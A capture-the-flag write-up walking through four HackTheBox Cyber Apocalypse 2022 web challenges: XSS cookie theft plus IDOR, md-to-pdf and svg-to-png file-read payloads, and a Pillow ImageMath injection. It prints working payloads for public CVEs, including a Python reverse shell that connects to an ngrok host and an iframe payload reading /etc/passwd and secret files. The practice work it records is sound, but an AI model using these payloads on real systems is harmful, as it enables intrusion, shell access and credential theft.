Cyber Apocalypse CTF 2022 — HackTheBox

Introduction:

Cyber Apocalypse was an intermediate to expert level, 5 days CTF hosted by HackTheBox. It had around 60+ challenges divided into 7 categories. I was able to solve total of 8 challenges from different categories. This writeup is for the 4 web challenges that i solved. There’s another writeup which contains reversing and forensics challenges (Read it here).

Challenges:

1. Kryptos Support:

Solution:

Giving in the challenge description, we have to gain access to the system. Start the challenge and navigating to the provided url, we the following page. The page contains a text box, a send button and backend button in the left corner.

Putting something in text box and clicking send button results the following.

Other than that, the Backend button navigates to a login form. Tried some default creds but nothing worked.

So, here the idea was to steal the admin cookies using XSS via support ticket. For this, i used XSS Hunter which provides easy way to exploit XSS. I chose the following payload.

Paste the payload from xss hunter into the text field and send it.

Checking the fires tab in XSS hunter, we get a successful hit from the target.

Reviewing the full report, we get the following session cookie.

Copied the cookie and added it in the challenge website cookies section.

Now, navigating to the /tickets page as shown in the above report, we get logged in as moderator. Now, again there’s a settings button in the left corner.

http://46.101.27.51:31892/tickets

Clicking settings button redirects to password change form. The best thing it doesn’t asks for current password. So, we change the password for moderator.

But, analyzing the request request in burpsuite, it sends password and also user id.

Send the request to burp repeater and test for IDOR. Changing the uid to 1, successfully changes the admin’s password.

Logging in as admin, we get the flag.

2. Blinker Fluid:

Solution:

Navigating to challenge website, we get the following page.

Clicking on create to new invoice opens editor and take the invoice data in markdown format.

Save the invoice and it gets listed.

Clicking on export, it gets exported in PDF.

Since, giving markdown format it converts it to PDF, so i searched for md to pdf vulnerabilities and found that it’s vulnerable to the following CVE.

CVE-2021–23639

Since, we also got source code with challenge, so looking at the package.json file, we can confirm the version of the package.

Also, also confirmed that it’s used to make pdf.

So, i went to the md-to-pdf package’s repo on github and searched for the vulnerability in the issues.

Looking at the issue, it also had the POC. But this poc didn’t work our challenge.

So, looking at the comments on the issue, some one had mentioned a modified version of poc.

The above poc basically used the read dir function, which takes path as input and returns the listing on that path. So, copied the poc and pasted it in the create new invoice editor.

---js
{
    css: `body::before { content: "${require('fs').readdirSync('/').join()}"; display: block }`,
}
---

Saved the invoice and then exported it as pdf and we successfully get the listing for root directory on server. It also had the flag.txt file.

So now, instead of using read dir function, i used read file function and provided it the path of flag file.

---js
{
    css: `body::before { content: "${require('fs').readFileSync('/flag.txt', 'utf-8')}"; display: block }`,
}
---

Then, create a new invoice and paste the above poc and save it. Lastly, exporting the invoice as pdf, we get the flag.

3. Amidst Us:

Solution:

This was a very interesting challenge. Navigating to the provided url, we get the following page. The whole page is dark and our cursor works like a torch. There was a spaceship as show below, clicking on it, it asks for image file upload.

Uploading the image, it gets listed in the left corner.

Analyzing the POST request, we can see it sends the data as json and uploaded image is also converted to base64.

Since, we had source code available for this challenge, so we go to source code to see what’s happening under the hood. It was a python web app.

Looking at the routes, we see that json data from POST request is passed to make_alpha function.

Looking at the make alpha function, it first retrieves background field from json data and saves it in color variable as list. Then, it gets image field and base64 decodes and it converts it back into image and then extracts RGB color bands from it. Then, it performs some calculations on image pixels using ImageMath.eval function from pillow library.

There’s also a requirements file which mentions the version for pillow library.

Searching for vulnerabilities in pillow version, we get pretty recent CVE, which allows arbitrary expression evaluation in ImageMath.eval function.

CVE-2022–22817

So, looking through the source code again, we see that the only field that we control and which is directly passed into the vulnerable function is background field.

Looking at the request in burpsuite again, we see that background parameter is passed at the end and it contains an array. So, we can inject this parameter and get a reverse shell on the server.

Since, this is a public server, we use ngrok which provide public interface to listen for requests and port forwards them to our specified post in localhost. We also start netcat on our localhost on same port as specified in ngrok.

Then, i crafted the following payload, which is just a reverse shell code in the exec function which executes the provided code in python interpreter. We specify the address and port provided by ngrok.

"exec('socket=__import__(\"socket\");os=__import__(\"os\");pty=__import__(\"pty\");s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"0.tcp.in.ngrok.io\",12113));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn(\"/bin/sh\")')"

Lastly, we inject the above payload in the background field and send the request.

Looking at the ngrok, we get 1 connection hit and on the netcat we successfully get reverse shell on the server.

Looking at root path, we get the flag.

4. Mutation Lab:

Solution:

Navigating to challenge website, we get the following login page. Trying some default passwords for admin doesn’t works nor does the sqli.

So, register a new user and then login. Redirecting to dashboard, we get the following page. It contains some gif or i don’t know it’s just moving pictures. There’s also button to export the pictures.

At the end of page, it says the following, which kinda gives us the idea that we need to login as admin to solve the challenge.

Other than that, clicking on the export cell structure, exports the moving pictures as png.

Also, looking at the website cookies, it contains base64 encoded session cookie and signature for cookie.

Base64 decoding the session cookie, it just contains username field. We can try to base64 encode new cookie and replace the old but that will not work as the signature won’t match.

So, the next thing is to analyze the requests in burp suite proxy history. It can be seen that when exporting the cell structure, it is send as svg and it converts svg into png.

Searching for svg-to-png vulnerabilities, we get the following CVE.

CVE-2021–23631

It also provide the poc which tries to read the /etc/passwd file.

So, copied the svg payload from above poc and replaced it in the request and send it and we get at png file path as response.

<svg-dummy></svg-dummy><iframe src=\"file:///etc/passwd\" width=\"100%\" height=\"1000px\"></iframe><svg viewBox=\"0 0 240 80\" height=\"1000\" width=\"1000\" xmlns=\"http://www.w3.org/2000/svg\"><text x=\"0\" y=\"0\" class=\"Rrrrr\" id=\"demo\">data</text></svg>

Download the png using wget on my box.

and opening it, we get the contents of /etc/passwd file from server.

Using this payload, we could not get the flag since we don’t know the flag’s location. Other thing we can do is that we can retrieve the source code of this web site. So, instead of /etc/passwd, we change it to read /app/index.js and send the request.

Download the png from response and opening it we get content on index.js file. The one thing, that takes interest is the path of the secret that is used to sign the session cookie.

So, we read the .env file which contains the secret.

Here’s the secret after downloading the pic.

Lastly, i wrote a simple web server to forge the admin cookie using the found secret.

Start the webserver and looking the cookie editor, we get cookies.

We can confirm that it’s an admin cookie by base64 decoding it.

Finally, we replace the session and session signature cookies on the website with newly forge cookies. Navigating to dashboard, we get login as admin and get the flag.

Thanks.